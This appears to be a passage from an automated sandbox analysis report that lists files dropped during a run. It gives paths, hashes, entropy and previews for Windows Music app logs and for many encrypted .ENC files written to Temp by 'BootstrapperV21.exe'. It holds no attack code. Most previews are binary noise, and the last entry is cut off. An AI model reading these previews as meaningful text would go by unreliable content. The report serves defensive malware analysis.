                                                                                        Preview:1.11/02/24 15:00:54.2676.MS::Entertainment::Music::Playback::PlaybackProperties::AppActivationKind::set - value = File.2.11/28/24 14:00:53.7936.MS::Entertainment::Core::Services::MemoryLimitsInformationService::OnAppMemoryUsageLimitChanging - Memory Usage Limit Changed to 18446744073709551615 from 18446744073709551615, our current usage is 19468288.3.11/28/24 14:00:53.5256.MS::Entertainment::Core::Services::MemoryLimitsInformationService::OnAppMemoryUsageIncreased - App memory usage level increased to Low, Total commit is 19468288 .4.11/28/24 14:00:53.2676.MS::Entertainment::Music::Playback::PlaylistPlaybackService::PlaylistPlaybackService.5.11/28/24 14:00:53.2676.MS::Entertainment::Music::Playback::PlaylistPlaybackService::PlaylistPlaybackService - userCid = .6.12/10/24 14:00:52.2676.MS::Entertainment::Music::Playback::MetadataProviderEventWrapper::MetadataProviderEventWrapper.7.12/10/24 14:00:52.2676.MS::Entertainment::Music::Playback::SharedEvent::GetHandle - Event EnterpriseDataPro

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt.~tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):42521
                                                                                        Entropy (8bit):5.29152498657952
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:eGtIAxlKa5Q3t6MpDoWTLSFHjoKfyulblZax:eGtIAxlKa5Q3t6MpDoWTLSFHjoKfyulK
                                                                                        MD5:97F35D0E196FC2BF01B683E7FC818421
                                                                                        SHA1:9F3E3B37F0F30D6F9BC4DF5FAA7020F8FF2968FA
                                                                                        SHA-256:607E3A0BDA77F2B72E09F946C632EE3CCBB12874C595BF3D6C27F96B58F7B069
                                                                                        SHA-512:9A313DBF26C15097CAF17F3F41FE12511861B115BE60070BAEAC725E38D84A5EE6F9B993416BD0A8238EC0394B9B111E11EAC5B7DCD3547D7A2C716D60CF21A8
                                                                                        Malicious:false
                                                                                        Preview:1.11/02/24 15:00:54.2676.MS::Entertainment::Music::Playback::PlaybackProperties::AppActivationKind::set - value = File.2.11/28/24 14:00:53.7936.MS::Entertainment::Core::Services::MemoryLimitsInformationService::OnAppMemoryUsageLimitChanging - Memory Usage Limit Changed to 18446744073709551615 from 18446744073709551615, our current usage is 19468288.3.11/28/24 14:00:53.5256.MS::Entertainment::Core::Services::MemoryLimitsInformationService::OnAppMemoryUsageIncreased - App memory usage level increased to Low, Total commit is 19468288 .4.11/28/24 14:00:53.2676.MS::Entertainment::Music::Playback::PlaylistPlaybackService::PlaylistPlaybackService.5.11/28/24 14:00:53.2676.MS::Entertainment::Music::Playback::PlaylistPlaybackService::PlaylistPlaybackService - userCid = .6.12/10/24 14:00:52.2676.MS::Entertainment::Music::Playback::MetadataProviderEventWrapper::MetadataProviderEventWrapper.7.12/10/24 14:00:52.2676.MS::Entertainment::Music::Playback::SharedEvent::GetHandle - Event EnterpriseDataPro

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):215
                                                                                        Entropy (8bit):4.8520163427620755
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:uncHUTIqUHek8KIfFhKP4SfHUyLGewqfg3lOtRhvRrUtAXtEGmNrOVgNnb:e28IqUHeksNhy5mOfYl9y9EGmNrDnb
                                                                                        MD5:49B781125941BE4CD229EC0A86D4EE27
                                                                                        SHA1:4EBC6DF83459B275C6F335464A2BE3BBC560ACA5
                                                                                        SHA-256:66926D6F16F2C22CBB088620A7D77C0E7D9C44581AA82F40255139AEE48AE28F
                                                                                        SHA-512:A98A2894A9ABA6DEA464F42C994A72996728D67C1DA9B453E7F0848D041CFD30DB090D9FC797C2AEAF3BDA90376A3BFFA7BB1FD6A85FB2EDB1943E2DB6D4435D
                                                                                        Malicious:false
                                                                                        Preview:<SRPData version="1" sessionId="1"><Outcomes></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="13" monthOfLastLaunch="8" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>

                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml.~tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):215
                                                                                        Entropy (8bit):4.8520163427620755
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:uncHUTIqUHek8KIfFhKP4SfHUyLGewqfg3lOtRhvRrUtAXtEGmNrOVgNnb:e28IqUHeksNhy5mOfYl9y9EGmNrDnb
                                                                                        MD5:49B781125941BE4CD229EC0A86D4EE27
                                                                                        SHA1:4EBC6DF83459B275C6F335464A2BE3BBC560ACA5
                                                                                        SHA-256:66926D6F16F2C22CBB088620A7D77C0E7D9C44581AA82F40255139AEE48AE28F
                                                                                        SHA-512:A98A2894A9ABA6DEA464F42C994A72996728D67C1DA9B453E7F0848D041CFD30DB090D9FC797C2AEAF3BDA90376A3BFFA7BB1FD6A85FB2EDB1943E2DB6D4435D
                                                                                        Malicious:false
                                                                                        Preview:<SRPData version="1" sessionId="1"><Outcomes></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="13" monthOfLastLaunch="8" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>

                                                                                        C:\Users\user\AppData\Local\Temp\.ses.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):5.675704882778696
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ISLdUk5ALIK4PHBMUv9zki9m5:T5/ALIKGHX9zzM
                                                                                        MD5:F08436C06C6CA13998DFDDF16BD49182
                                                                                        SHA1:03B50140520941A580232FC0F45200EC91E3EA47
                                                                                        SHA-256:DDD098F07D4B18568DEB6AAA1033AF71844DDB4F32C3797E65158A1921794B83
                                                                                        SHA-512:D100C6C09249D5AFDB07C1D1178BA3FDF3B401379D87F9BF2DE30FFDB4DFC26A81EB4BE88AE7FAA42920E9016A99FC54F5EF1F6A44C333936276F2CE89F642C2
                                                                                        Malicious:false
                                                                                        Preview:.e.%Q11d.....b-.qMe......TJ...[."^.V..z...V..@..M.X.g.%*.5..

                                                                                        C:\Users\user\AppData\Local\Temp\0164771190.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.569049582637604
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:ySagncX95IEMpfjf0u0laNMok2MZ/JLdJzylidpXv1Mn:Ba6cX9KvbD8Glk2MZBLdJz9dli
                                                                                        MD5:BC0F541CA53A60938DE3FD933005B4BC
                                                                                        SHA1:D06B3D0EB77A1F82C52DD3C803442DCAC25D893B
                                                                                        SHA-256:F2911DDDF7292C305F2B330383690E901B515CFFCF2D3ED5DE88119F4873F06E
                                                                                        SHA-512:91CD2BCB67A7F773C4BB3C20EF993DC8D2A3C01FFB973962DEE4B482B17B242A95DB657E7E70E84B12E3CD5BFEB16618088E577EF963F5EF16BF920C8703504A
                                                                                        Malicious:false
                                                                                        Preview:kl.8....D..s....L~..j.PH./.....}SW4...9.!}._3!. ..QH.......7..y@.o...w&7..u.Gs...Wr.............M._)v....BNd{,^.$.t. YH......,<.5..~..<v.u. P[. tF[E,..A.....S...."|....O..oC;M:.?)..$.. ...T<...U..^.KL...1....9...;.zK....yD.....pS.."0(.....i...7.w.....|..r..k..G.i.r..h.#R.k]...73.K...#[.,y...q.%...G..>.|.K.(H........Z....'........ob...[fb_..~}.....~..}.-..@l....F.}......#.q....s..{..c..?..*I......v...r......U....1..tv.._^.......*...W?b.xP.M...m.G.KA?Qs8&x.. AY..8O.J .......,8.[s4m^..q

                                                                                        C:\Users\user\AppData\Local\Temp\0196354653.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.53740808321709
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:BH4Iri5ghJngdtmtNgpCD1Rls5xfkR2k37y67WnBimXTSwjB:FPeInYtkgpU1LOxf22k32G+BisSeB
                                                                                        MD5:BD252C862D20A0A96AAB45BB83C58DCB
                                                                                        SHA1:3C3E853A6E304A8910C21F0E857A4578AC74B233
                                                                                        SHA-256:97DB8855B6406E664D02CAB22FFC8240432ACB10455A52DB6C006EC8E3C1F1B4
                                                                                        SHA-512:F340603EF5AA164922AD29ACE9678E3D5473483A209D61819EC6DA1C01917EE9F83A6C383055053AAE9E04B7302F4B22BB09AC03617C70AEE225F23BBC11C4A4
                                                                                        Malicious:false
                                                                                        Preview:c..w.V\y.\V........tJ..v.T.....;d8..*].....:.....p..7..A(q:.'.+.9mN...xaG\...$.7.,...+g..Y..w..`.p.4dx...T.DO].T._.SVd..#.....cx.7...B..z..XO.5.e4v]..@.!..-....3.....z^...6-.p..;..lX4.'x.r....G7...l.S.......a.........Y3........_..V....(3'..:O..W...X|..+t...I..$I....E....s-.h.8.9E...O..wS..... ..vE..B.})..:..:f q.g].,...8...>;p...X......j...$e...2.0.CAg%.>......I.).......HL.....H...).).?L.........2.daNF...o]>...{....\.~.+t..a..Dn......t.......U&.N.z...T^\..I3..v.S.{..B..C....|I.b^

                                                                                        C:\Users\user\AppData\Local\Temp\0409654664.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.57483809981975
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:I3Tl9Y8Qjh0+wwXBaw+xhJ75URY5CPPzBcZn1KslHP:I8vFFwwXYvkPCDv
                                                                                        MD5:58A8FC23BD90EF4ACE5B8E1811923459
                                                                                        SHA1:03CAA4FA9319A46555EC46713A70B8CC09F7C96C
                                                                                        SHA-256:1553E063A5BE27E249453669B85FC9B108BF7E4B13B6F158FEE3B63D87D470F3
                                                                                        SHA-512:B51219553ABA17C7444AB82F399BCA2AA255A93184C14B259787774F8571D3B679781571BFB13F77C5BFFE5933D63C20EEE3EF1E844170D9B4D47CAD074F9AA5
                                                                                        Malicious:false
                                                                                        Preview:.h....Xn..di..na6.&..e.>.O.e|.....Z...h.F.Y..k..{^.'...=...I...~..k7..@.."'.....:.)M\..0..*W...v....% .....z........$....\.....6..N.D..."X...w!.C.l?..xr.oa.%Pj%Y..\0..............t.nE..F..8_.......a.O..*ux...ea3,..h(....L....h..}l.+`...v.....^R. `)...V...iRLg.N.....:..0...Cq.e....+d...D$}.b....>=.F.O#..d.Cj..NG.\....t.....3.%....{ ...m5.%{.l.>.?A....iP.!>.}.s....B.C),.8".n=.../de..$ d...q!`An....5....0...v4..YYt.....KdO.....H...Uob.....Z#.<,R.L.nydh...>...eBbBI...Tb..C.....V?

                                                                                        C:\Users\user\AppData\Local\Temp\0450125302.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.578953218228756
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TXyhaY+zxZZkhWLraGIQotGBCWM85nEQasPc987pDp:TihaYGlD1XoED5n5pPcK7pl
                                                                                        MD5:D353CF3E23A6AD12A804085DEFD2DF30
                                                                                        SHA1:15969800C1D0F669DC0E76327536D1D24309270F
                                                                                        SHA-256:932B1DDFBFA8D5F7A84A4BAFD4812550E4AA115B8B51248595804BEF63BF9F13
                                                                                        SHA-512:C85667BE801A5414C7A2D82E153CBE68362CDFE1D21B021112EC04CB38B0A83DB6E4F89B40042085CBD90C4BFCCFAE6097DC51E73A389F11F3AC27232EF37F01
                                                                                        Malicious:false
                                                                                        Preview:Z;....38...9..YA.S......,uvkn.c....i2.q..C`..]...A.i...\.=i....N.W..A....q.$F...Z..y..uV..gc...v.h...Z.2...:.F.....2....)...m<.g:#.u....h8z......Q.D.yq}..d...#[?.c!J.\%..11S...(...<)tV.#.........d.'J..~I.........w).2.X.6pt...M.03.6XX.^..2..P...E......z...9.>..7..d..Y.6...#.c..............o.FS.X5 pS.[...z.s@...4...H..R....,...'.V.I...&..*re5t ..%...q..K~....hwh.....Q.%.;?.Ri.Ty.....t...aP.C..\..f..?$..... .I....Kd.E+......bF..p_...iWqH..{4l.Y51Y....B3?H..,..c..-........1..n.9

                                                                                        C:\Users\user\AppData\Local\Temp\0518291756.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.553769589188221
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:byOdIbPsua1IjSiE7DVaAKcoeA/1hlCs3hNVjj:GOdIAuWIj6ycU/BDVn
                                                                                        MD5:1C7237209DA8155119F9417D70A83754
                                                                                        SHA1:32076B5B5DE9303919C072D36A114318F488B167
                                                                                        SHA-256:8A975CFF1C6B1CAB56776FF4236C9546413B0E399424AA6699233162CE5FFB95
                                                                                        SHA-512:0C5AD87F48DA108EA8B749A5CCB57C67CFB2DDBF1DF548C92F17A38E57069F14248DA5D494825A22C3E7EA78E27055A84FF000890E60E3C5A7B86687766F4E05
                                                                                        Malicious:false
                                                                                        Preview:l ..6p...=..0....M..!.6}...,...]i.r.....'>.........Z..t.W.,I...........g...?..9?.a.E.. ..c.4BU.+.....ko.l.r..A..1.7.Y..?W....S......R.HC.8...y..Q.|.......=....*.....s...&...3$..*.v..-....[)Xl-.._u.........!...R..#.e.....G.b.Qq.nR8.n.J.r.(.f..qO.6..'...\2U.3......t..........yn...wz.....a..L.AqyA.j|.IA...U..D|..t.'..o.J.....n..F.-...M.../.....)...H..........wZ...^.G..r[d.r...d....7) ...\...e.....?..UuWp.*...w>...h.4p...l....kx.`.-8..O&Z.8D.....&..U.S.A.,M.8..~.6GA.K...XMQ..Z..6

                                                                                        C:\Users\user\AppData\Local\Temp\0653671941.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.549151370483923
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:HTFIl/jc2OdqrWeMLzJExMJ5iq59HILbYSQpg/RLG3IUH1LrJLMo77uhowjKzUNt:HJUciMLdyjEmf5GL/vuhoKKzUNuJiggP
                                                                                        MD5:26EEC9AEF5C0AC1B5D214BEA56F2DE25
                                                                                        SHA1:7ED4863C59C47774393144EF4FF3E7360DFFEFD1
                                                                                        SHA-256:8A95CD4C29DACDE6629888CFD37D219499635F97F38CD3C5B69AE3E51DE954C9
                                                                                        SHA-512:5ED751EDCB127FDA97B061B945CAEB77F27D6B422139D1490E1EF201070C6FDA09FB6C13A883CC5E9A1E1819EC943217CC093A20AF5C05CB2D494340C74DFD6F
                                                                                        Malicious:false
                                                                                        Preview:UW7......&S.j..g....C{....o....|..!N..A9.i......D..A...E..<.........).....}8 ....y....YQ.Y=.....b.tE.....JU.W............02.HM.....V.J..{./.W* ..[v^..).,.......h.....}._......G........)....bY.bt.;......3K;f/B..6...4../..N.._#.1V.V.&f?.4O....!....8.n..~r..n^..b.N.{X.9T.........;.f.p.3..{,..C..*C..d...W)+....a.P...a...^......KM;.u..c.y6...{_i..^.~y..f...E"S..m..M.h0.....1U;f..Z..Y.n....%.9.kq....b...~.N..e0.1.XchM.r...,~.P.x..# u..4Y..t.5....W..H.G[.N.D".<6Ua..+.)r.b..E.:..\n.{....

                                                                                        C:\Users\user\AppData\Local\Temp\0982390758.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.62771156291854
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:gDXWxsVERw2nlwBrfwp9M8YDHbu1x4SewiYmTdUHEDXcC2Lii+TSj:gCxwER/IrfIM3a4wiLTOHMMnLii+TSj
                                                                                        MD5:609C850F3405B1EDDA296DBBB45D0973
                                                                                        SHA1:14516407EDB8C2DE981B3B8FD6159C1FBA794EB1
                                                                                        SHA-256:DB43CAD0F836BA5FD9D194BCFA1A09D002E06017F04BA0E844C46A9287C3ACEE
                                                                                        SHA-512:8E13D5792B76D542540800081FB9FE63E8A03A966A601275178774C53E5C3A3D96C233BA37622AAB86285EAF892CF1B16CC5115F62E6C770D631319A68BCADD8
                                                                                        Malicious:false
                                                                                        Preview:.o......8.'.*......vds.ub^..z.{..,.i.M.)...w.1.#.g.Tz...W.A.2...-.....>k....$.P.1../.g_wA&.C.+....9"'..^d..o.6.g+...I....Z.BI....x<p.d.i<5..b.iD...g[.}.~.@..i...M9.-.d.:#...o..M...=...@............?..zv......Z.=..J=.~Y.""....@.tt..r.B....M..I..k.....=.K....b.Hk!...K.4..Da.#.HD.@...!.m..N_..r9...s..h.H.n.......*..N|.dX(.C......G..H}........}~.6.V.a.....Nw.Ym...i.....AA5.A...n....OHE.>0.[.;t....>. .E..T.q.H..#.(.HP\s..F.9.t....].D...F.......e.....u..mj.......@...S..l.cP.*..Yp,.=.>.

                                                                                        C:\Users\user\AppData\Local\Temp\1033868256.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.60242199250806
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:VenwoczPciuwBdcR92juxMCqNpK5k1hToBWX/h4lbG:V4wocjciuGdVgV2pi0s+b
                                                                                        MD5:7CBED583859290412042AD7702B33C05
                                                                                        SHA1:2E9B928228F288BF9C2870A0DC370BC886416DA8
                                                                                        SHA-256:C28F4C49EF6EA146F55D2F2FCBC7C41B3DA865D37F7C677751AA6E9180B81DE9
                                                                                        SHA-512:9433D948F04655A54886EF37D830C618A29B82B99F833892926E4706EF2A3F828F5DF9DBB6793BBEF47956B520AFB24A40AD92F6B460ED6FF3E8216C1A02C65B
                                                                                        Malicious:false
                                                                                        Preview:.g(.mk..3.=.\JI..._..P3f.cY'5s..b..w.{....\.F.........%....i.HI....c.. ....{^lC_......2....7.G.q0.dhO...y[r......<1:....#.aJz.....g....1.........j.....n.=......4J....z'x.o"+y.......L...R.6...;....u...!c...YB....X..{.T..&.....x...>.h.0....!.:.....&Q%k.....R<>..{w8.X.+0BG1.^5p..._.MgV..]'....SQ..s........\:...}...2.z......#...J..C...7~......]J..i..u...6........ix.....@..1.......F...q.+.G... -.....#..*?.......iO.Lu.I.Q{.l..X..N..._.91..7.........d..I~....f-.......,..ds...PL..

                                                                                        C:\Users\user\AppData\Local\Temp\1141274626.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.5826055068777505
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:GKiHOODtWXkY/jrx7X96M0Mcun+BpDcSPEdjxMuC:GdfY/HdtYMcJRcSPKj+7
                                                                                        MD5:55BF2949421C1F9B9D9781236A889210
                                                                                        SHA1:A64AC076926596E11D2DEE0AA6852097562D7A60
                                                                                        SHA-256:3E57CEF7F421640882317521F48CAAB4EA72AE91491771763B30B10878519DEC
                                                                                        SHA-512:CD6BB77A9B233BBA9E55302D139FB0132E30209FF0AB2CC05BB540726F4B0667C784FB5A27EF1449580A8570AA8C1EE0DE86BB244C312A95C76643ADA263773C
                                                                                        Malicious:false
                                                                                        Preview:..MKq..k.EI.yv7.@.S...7'..O7V.....'.ZI....,W.B..-.!.W..R.W..7wN.c.r.j..E.....G.P.d..y..kJ..uv..:6S..d..;...y..Q..K6.|.ooX.H..)B..:.uT;.Nu..i.......K.....t.....Nj.r.Oy......uH|...qB....~:tIx.S<...\.v..='....`..>...1...u.....9...p.....8....<.......eQ..)t;...6A&.Y.9......n.8.........<..[....]...s..%.u.7..b...?.3}.`$..V..P...\[....b..}X..Y.,.t7....9...m.(H..........#.c,.......R...F......L@...^..k.....9l..Z/.F...p?.3..V.at...X.{?...:.c..gml.#.0..i.Q....U .5...`...3...c._....

                                                                                        C:\Users\user\AppData\Local\Temp\1206337459.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.642769191716482
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:cRW0XIIHZ7K/Q1qjOicqedTlMalx9LCav68XLWam+n4LDytn:yW0PZKo1qt0dyalPXi87Wam+4it
                                                                                        MD5:77DBA8C4814CB8BCE519AB9C9CFE33D1
                                                                                        SHA1:CFCA4E37F52E828D343A5BB33B08B98AE1642F66
                                                                                        SHA-256:230C16515F1BF0C499F9AC0FD4B5C5DD23EC3770C76E61FBD508BF978BDD837C
                                                                                        SHA-512:C37C9C4629C06994B8B7786E8D228DFCC9CB74D221118FA888D74D9B518681D08A6204ECFC84AC824C4CEE84B822129C726AE9956C421EDD425CEC9732A4C7B3
                                                                                        Malicious:false
                                                                                        Preview:.&-..ER.o..U.M!....mY..K.@......._j....9 .._...}.]+H..R......i..k.E..u..M1l.!7ouu !7yXd......@.m=]./AZ,zW1...>.........(..c.FI....pb~.NT..'..:...F(..fs.i......;.I.qFVI~.u..&;8~.....A..._...E.fmH.Y....XTa..|.l....=m...NX.$B1....<k....+h....q....YS...>.G........,.V$...J...K.1..t0..Z........,_...P......N..._....I.........#YW4..@......q_....G..F.......M..S..9_.....gY.G3.sv...ZE.D(./.0.....e.kC$...C.QF!..J]o@..5;.)..`d.5.)@...0z...k.....&..`..b.9x;....2n..$+.hJ..b.... .sE..)'.?X[..Yn..

                                                                                        C:\Users\user\AppData\Local\Temp\1237160943.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.585789069569318
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:XITwv1RX+sfFucvKbkQLPvtXj//qT3au5IPQxBc1Q4HAuvlN:YsNRu4NvwkQJT//uIPwV4HAyN
                                                                                        MD5:849E0C8F993C234AEFF6EEDCBA81D6C6
                                                                                        SHA1:E690413FC7B6FC4A901AE71FB38923A5ADC89C0C
                                                                                        SHA-256:F28F8AE1D1343FB356FA0AA01E500B35563DE1918E92330BFEBBBEAA6FFC1A46
                                                                                        SHA-512:FBF23F269DCA01C3F72C6CF6D2742AFEAD7BBCD43D4161EFCC18ECEB0D667E6B32BDCF9B8BD66B503EF7606DC71817211F3E391108FF2D5DA03942C2D5252038
                                                                                        Malicious:false
                                                                                        Preview:>.1p......Y..~..U....#.9..@%cC..4.z3$...>o0}D..U$.....(.5..6......oV....z........d..8.....y....9....+.S[.....z....m..I.h.[...S."../..l..t....|...z.}-7..)!&.n...f....rvt.H..T.Q..m..wW.f0`....G.A\....;..l..o.Pvb.h.Qi...%....x1.....|.a.V.....q..xq!_.q..I..^.].>s.?...1.~a.K...v.g.{..l.*.&.To.>h&/A...........Z.l..r2...&.HP.A.5.l..j.0|...Y.'...[tb...._.`{U..(8...-63....Z_(v\.P...,m`.`...@i.@."..].........."...b.l.Lf.....?........#".1.)I....^+*Y..S.3.^2.L......yh..J.%q-@..S. ..[.....H.(.

                                                                                        C:\Users\user\AppData\Local\Temp\1239919175.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.57898449250806
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:jT4H/MI39K+nGZWi4kmq8tQ/m4h3bKFz/cuSu:4MIlnGZUq8tEh3gT6u
                                                                                        MD5:1235CC37CE87494F0683266077E934B5
                                                                                        SHA1:D35782E355FBB5EA2FC51C45C2C639C9EDC43F6D
                                                                                        SHA-256:B461359318914B4A9154CE6867EFAF257702A76BEB93FA7537CF26CFAAF54D2A
                                                                                        SHA-512:0AD9FB256E6215413198B62690F985E30B96E73685BB021D01B5E04679618AC0CB3A6756B2CCFA9DB6FFA4A1DDD39F3407F94A6EAC21A17D149DA26CD4A83BD7
                                                                                        Malicious:false
                                                                                        Preview:..M<.Y}....$!./Pq.)Sk.1.V.*RZ....3.[....m..^[A@/.2z.4..;.g.H-L..:FB...y0lE....Kq.tH.....E.....6..&a..`X.w.......L&..<....}j...5.+.......>Z..j..2..t.y,C)E..]...........9....].*...G.Lr......LtE....44.....'..<:....V'.X*......H...p6..~]........x..z..d..........3.6Vl.r........z^8e.=.g[."}..) 9.....Y5...G....L......{...q.AxF.w ..:{... `y..../.W....0..\..h.-..0......6..<K@..!a...axiyOd..L.]....(5.."Pq]........_.....k.E...=$.Y.,..\......J..o...A9.....\-.L.0.+..g...;.5n......p.....J..

                                                                                        C:\Users\user\AppData\Local\Temp\1287572840.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.650726289218722
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:5rESCCcrZGSdtUCM5Tbc9CaOLXb9E/uVwg5jHiH4xWj4Ou8JI:CSCVrZkCUTbc9CpjhE4wE7iuWBu8y
                                                                                        MD5:C70D22B792626C136E3F84ADD2E8EFA2
                                                                                        SHA1:832B0837AF755C12A084E42D7E8A1A3A88CE0AD6
                                                                                        SHA-256:4CD7C4C25D68CB81881BCB3F3FC3A469BFF8A4EFAEFA79BAC1035489FB84E156
                                                                                        SHA-512:891A33207B94E190011AF6881BBE0F7069DA0755A3F5C81CCA8D7649AE5056092F399F4A8670310C46173737A5716229516E0241D746981791AA88428E1B8015
                                                                                        Malicious:false
                                                                                        Preview:.Wte...K&.F.........h.".].tHP...U..qN.n." ..J.@...3fE.;.?.........]..........O..(C.........RyAg..~!C..4..q..y.....k]..6.{.v...@.....#H...C,....&.........{...`.\..q.....>jD..F9<*)h...X.R.A....!...?..T_...d.X..J..E.k..YO...oz..........5...:E%.8.Dm.N.QY..x....p.^KQ.5..8`.1V.4....cZ..p....xF...u.At.X...s.W./.s[...]...BK.@9&...'-..4.n..W......gt....;..!.0.i-1V.....'.C^..e...c+.8j...k.v..9.....^.o.u.)4...C.P..!..".9b.wb.|4.#.....0.....w.....,U.%......m...3.P~.$Y..#1@|..... .....'....Sj.n..

                                                                                        C:\Users\user\AppData\Local\Temp\1422339599.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.554336960390279
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:ufmVQaZ57lx8bL4FP+/A6wvwaTRFMv/lBD1bdUAnqPqf:ufuQaZ/yL4tAwvwYRC/lBDcAh
                                                                                        MD5:BA165B9A6349388C9B29A95CD59CEFDF
                                                                                        SHA1:F43D5CCE402633BE75AA7B7CF04F4CC668DE3752
                                                                                        SHA-256:5899392B86D88FC647FB9A0D37FC94F84A93940528F52270D67B7D28A2E7D3E8
                                                                                        SHA-512:09F893E04E82E199A72D5C953FFA5865A2003AE66861AA8E806E4724EB047EB4346463DF51E980A11339F5655700388EE541AA69D195B92AE067F03A3163E94E
                                                                                        Malicious:false
                                                                                        Preview:h.._.THuj.}a..!G.....g.3...,...}.S...."..QW<....)............nLb`....i.E*o.a..:zR..c.(4"!#.-N8..5E.of......q..X.9..os.<o.Td'....SD..0P.G...*.].....h....................\.'[.....l..w@?.....=.....30.'q:.Z..?|....J:.J.?..n.....*..n.a&:u...X.....Gkr....i....Y........c...G.>I..gQ2'..u....D....Z.ev%....nb....yE.{.0..;...Z...b....<}ff.O...e..,.4...f....F.V....YSfF. .N....c..............X-.....2n.L).o.........MS.......}4q7....ju\.Q0..`:.Q.A1.R...Z....VGu...bu.B>..#CR.&.I...v.q:v.CF.o*.;.70..>...

                                                                                        C:\Users\user\AppData\Local\Temp\1927994670.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.642655868493546
